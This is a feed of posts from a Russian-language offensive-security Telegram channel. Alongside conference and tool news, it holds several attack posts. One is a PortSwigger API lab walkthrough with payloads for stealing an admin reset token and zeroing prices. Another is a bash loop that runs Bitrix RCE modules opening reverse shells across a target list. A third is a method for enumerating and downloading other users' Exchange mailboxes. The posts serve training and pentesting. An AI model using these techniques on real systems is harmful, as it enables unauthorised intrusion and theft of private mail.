#выступление
Выступил в Компьютерной Академии TOP. Ребята были очень классные, все покайфовали с доклада. Раздал комплекты стикеров, тем кто рассказал самый интересный варианта похека компании.
Отдельное спасибо администрации Академии, которая смогла оперативно согласовать данное мероприятие и выделить аудиторию.
Выступление получилось на целых 2,5 часа
Вы хотите, чтобы я приехал и выступил у вас? Так ещё и можете это согласовать?! Тогда пишите мне, я всегда за, если у будет время!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥30👍9🎉2❤1
Forwarded from #Arm1tage
API Labs
На моей нелюбимой платформе SwiggerPort, не выкатили новые лабки по АПИ (я кстати не делал эти лабки, нет). А это значит, что не выходит и новый пост на не моём паблике (я кстати не админ этого паблика, нет).
Суть этого раздела дать тебе понять, что фаззить, сука, надо. И надо это делать красиво. А чтобы и ты мог делать это красиво, можешь использовать вот этот лист с параметрами для фаззинга.
🤨1. Exploiting an API endpoint using documentation
🤨2. Exploiting server-side parameter pollution in a query string
Находим forgotPassword.js файл и выясняем, что есть параметр reset-token.
Теперь создаем POST /forgot-password запрос с %26 символом (означает, что он декодируется в & на серверной части) и фаззим (например через интрудер) параметр, там где $$:
В итоге с помощью фаззинга находим параметр field. Вспоминаем, что мы нашли в жс коде ранее параметр ресет-токен и составляем финальный вид:
Таким образом вы говорите серверу (из-за parameter pollution) выдать вам ресет токен пользователя администратор.
🤨3. Finding and exploiting an unused API endpoint
Меняем GET на PATCH:
🤨4. Exploiting a mass assignment vulnerability
Ищем параметры в ответе сервера:
GET /api/checkout
Теперь создаем POST /api/checkout реквест с найденным ранее параметром. Изменяем значение percentage на 100 (типа 100% скидка понял да):
#portswigger #api
На моей нелюбимой платформе SwiggerPort, не выкатили новые лабки по АПИ (я кстати не делал эти лабки, нет). А это значит, что не выходит и новый пост на не моём паблике (я кстати не админ этого паблика, нет).
Суть этого раздела дать тебе понять, что фаззить, сука, надо. И надо это делать красиво. А чтобы и ты мог делать это красиво, можешь использовать вот этот лист с параметрами для фаззинга.
🤨1. Exploiting an API endpoint using documentation
GET /api/
DELETE /api/user/carlos
🤨2. Exploiting server-side parameter pollution in a query string
Находим forgotPassword.js файл и выясняем, что есть параметр reset-token.
Теперь создаем POST /forgot-password запрос с %26 символом (означает, что он декодируется в & на серверной части) и фаззим (например через интрудер) параметр, там где $$:
csrf={ваш_csrf}&username=administrator%26$$В итоге с помощью фаззинга находим параметр field. Вспоминаем, что мы нашли в жс коде ранее параметр ресет-токен и составляем финальный вид:
csrf={ваш_csrf}&username=administrator%26field=reset_tokenТаким образом вы говорите серверу (из-за parameter pollution) выдать вам ресет токен пользователя администратор.
🤨3. Finding and exploiting an unused API endpoint
Меняем GET на PATCH:
PATCH /api/products/1/price
{
"price":0
}
🤨4. Exploiting a mass assignment vulnerability
Ищем параметры в ответе сервера:
GET /api/checkout
"chosen_discount":{"percentage":0}Теперь создаем POST /api/checkout реквест с найденным ранее параметром. Изменяем значение percentage на 100 (типа 100% скидка понял да):
{"chosen_products":[{"product_id":"1","quantity":1}],
"chosen_discount":{"percentage":100}}#portswigger #api
🔥14👍2
Разработчики представили Kali Linux 2023.4, четвертую и последнюю версию дистрибутива в 2023 году. Новинка уже доступна для загрузки, содержит сразу 15 новых инструментов и GNOME 45.
Команда Offensive Security сообщает, что в финальном релизе этого года в ОС добавлено не так много новых функций, зато версия ядра обновлена до версии 6.3.7, а также появились сразу 15 новых инструментов:
cabby — имплементация клиента TAXII;
cti-taxii-client — библиотека клиента TAXII 2;
enum4linux-ng — следующее поколение enum4linux с дополнительными возможностями (инструмент энумерации Windows/Samba);
exiflooter — поиск геолокации по всем URL-адресам и каталогам изображений;
h8mail — email OSINT и инструмент для поиска утечек паролей;
Havoc — современная и гибкая система управления и контроля для пост-эксплуатации;
OpenTAXII — имплементация сервера TAXII;
PassDetective — сканирование истории shell-команд для обнаружения случайно записанных паролей, API-ключей и секретов;
Portspoof — все 65535 TCP портов всегда открыты и эмулируют сервисы;
Raven — легкий HTTP-сервис загрузки файлов;
ReconSpider — продвинутый фреймворк для OSINT;
rling — RLI Next Gen (Rling), более быстрая многопоточная и многофункциональная альтернатива rli;
Sigma-Cli — список и преобразование правил Sigma в языки запросов;
sn0int — полуавтоматический OSINT-фреймворк и менеджер пакетов;
SPIRE — набор API-интерфейсов SPIFFE Runtime Environment для установления доверия между программными системами.
TAXII – это протокол, определяющий способы обмена информацией о киберугрозах через службы и средства обмена сообщениями (RESTful API), и набор требований для клиента и сервера. В TAXII поддерживаются две основные модели обмена информации об угрозах – Collection и Channel.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤🔥4🔥2 1
#codeib
Код ИБ. Итоги 2023. Москва
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍5❤2👎1
Выиграл в номинации «Все великое начинается с малого». Очень рад, что жюри выбрали меня и мой канал победителем в этой номинации!
❤25🔥13👍5⚡3❤🔥1🥰1
Похек
Не смотря на мелкие косяки, которые есть всегда, нетворкинг и организация был на высочайшем уровне, за что отдельная благодарность Ольге Поздняк и всей её команде, включая волонтёров, которые приложили максимум усилий к организации этой конференции.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤5🔥2🤣1
Forwarded from вольтаж
Пока каналы переполнены советами, крутыми тулзами и историями успеха, поделюсь рефлексией на прошедший Standoff Hacks, включая все свои #fail'ы, что из них вынес и почему интерес к ИБ разгорелся ещё сильнее.
https://teletype.in/@hackthishit/hacks-reflection
https://teletype.in/@hackthishit/hacks-reflection
Teletype
Все совершают ошибки, или как я сдал 0 багов на хаксе
В потоке эфемерных советов, крутых инструментов и историй успеха, соскучился по историям не_успеха, тупым ситуациям и мыслям об этом.
👍13 6
Похек
Quick-tricks Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix Установка: go install github.com/indigo-sadland/quick-tricks@latest Функционал: quick-tricks [command] help Справка о любой команде quick Запуск всех быстрых модулей ('recon'…
quick-tricks
9 MB
Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT
for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤2❤🔥2
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Одним из трендов этого года был DevSecOps 💻 , а также чем заменить ушедших вендоров.
Нашёл хорошую статью на эту тему🤔
Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов
В рамках материала автор рассмотрел следующие вопросы:
➡️ Можно ли платформу ИБ построить бесплатно и в кратчайшие сроки?
➡️ Можно ли ASOC сделать понятным для бизнеса? Бизнес — наш основной заказчик. Понятно, что все процессы и все что мы делаем не для себя, дома ASOC нам не нужен. ИБ‑специалистам это тоже не нужно, все это нужно бизнес‑заказчику. Поэтому нужно сделать платформу, которая будет понятна всем.
➡️ Как оптимизировать процессы ИБ, сократив Time‑to‑Market до минимума? Меня сразу поставили в определенные рамки: проверки практик DevSecOps в CI/CD не должны занимать больше 10–15 минут. Нужно как‑то вписаться в них.
➡️ Как оценить жизненный цикл уязвимости и эффективность работы специалистов ИБ?
➡️ Как подготовиться к включению QG так, чтобы ни один из разработчиков не пострадал?
🌚 @poxek
Нашёл хорошую статью на эту тему
Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов
В рамках материала автор рассмотрел следующие вопросы:
Please open Telegram to view this post
VIEW IN TELEGRAM
Похек
Одним из трендов этого года был DevSecOps 💻 , а также чем заменить ушедших вендоров. Нашёл хорошую статью на эту тему 🤔 Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов В рамках материала автор рассмотрел следующие вопросы: ➡️ …
This media is not supported in your browser
VIEW IN TELEGRAM
С вами инженерный отдел по динамическому анализу Swordfish Security. Продолжаем разбирать полезные кейсы, и сегодня мы рассмотрим, как в DAST-сканере OWASP ZAP настроить автоматическую авторизацию в приложении и переиспользовать ее в дальнейших сканированиях.
OWASP ZAP (Zed Attack Proxy) — один из самых популярных инструментов для проверки безопасности веб-приложений. У него широкий диапазон возможностей для обнаружения уязвимостей. Однако, прежде чем начать сканирование, необходимо правильно настроить инструмент, в том числе и авторизацию, чтобы тестировать приложение с одной или нескольких учетных записей.
В комментариях к предыдущем посту про DevSecOps подметили, что в статье ничего не говорилось про DAST. А зря
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥4 3🫡1 1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13 2
This media is not supported in your browser
VIEW IN TELEGRAM
Сегодня расскажу про внутренний пентест, в ходе которого мы без учетной записи добрались до администратора домена.
В этом проекте использовались много разнообразных техник: от декомпиляции приложения и расшифровки извлеченных учетных данных, до повышения привилегий через базу данных на сервере и сбора информации от имени учетной записи компьютера. Под катом подробно разобрано, как они сложились в успешный вектор атаки.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍5
Forwarded from true_security
list.png
45.3 KB
Первой публикацией я хотел бы поделиться интересной историей про ms exchange.
Пользователи могут управлять разрешениями на доступ к каталогам своей электронной почты.
Это может делать и почтовый администратор.
При получении доступа к одной эл.почте мы можем проверить права доступа к чужим эл.ящикам:
!!!Важно, ваша учетная запись должна иметь доступ по протоколу ews!!!
1) выгрузить список всех адресов из глобальной адресной книги:
например, через MailSniper.ps1 (https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1)
2) запустить проверку прав доступа через мой скрипт:
https://github.com/feedb/ebussing/blob/main/ge.py
в файлу gal.txt у вас должна находиться адреса эл.почты
Будут выводиться записи root, где то будет отображаться дерево как на скриншоте.
Наличие дерева подразумевает доступ вашей учетной записи к каталогам и их содержимому эл.ящика (см.скриншот)
3) находим почты с разрешенным доступом и выгружаем содержимое каталога входящих писем скриптом:
https://github.com/feedb/ebussing/blob/main/download.py
в emails.txt складываем почты в которых есть доступ к inbox/входящие, создаем каталог out
и запускаем
В каталоге out будут сохраняться eml чужих сообщений
P.s. скрипты написаны на коленке, в новой версии будут параметры и т.д.
Пользователи могут управлять разрешениями на доступ к каталогам своей электронной почты.
Это может делать и почтовый администратор.
При получении доступа к одной эл.почте мы можем проверить права доступа к чужим эл.ящикам:
!!!Важно, ваша учетная запись должна иметь доступ по протоколу ews!!!
1) выгрузить список всех адресов из глобальной адресной книги:
например, через MailSniper.ps1 (https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1)
Get-GlobalAddressList -ExchHostname owa.server.com -UserName domain\user -Password password123 -OutFile gal.txt
2) запустить проверку прав доступа через мой скрипт:
https://github.com/feedb/ebussing/blob/main/ge.py
в файлу gal.txt у вас должна находиться адреса эл.почты
python3 ge.py
Будут выводиться записи root, где то будет отображаться дерево как на скриншоте.
Наличие дерева подразумевает доступ вашей учетной записи к каталогам и их содержимому эл.ящика (см.скриншот)
3) находим почты с разрешенным доступом и выгружаем содержимое каталога входящих писем скриптом:
https://github.com/feedb/ebussing/blob/main/download.py
в emails.txt складываем почты в которых есть доступ к inbox/входящие, создаем каталог out
и запускаем
python3 get.py
В каталоге out будут сохраняться eml чужих сообщений
P.s. скрипты написаны на коленке, в новой версии будут параметры и т.д.
🔥8😈1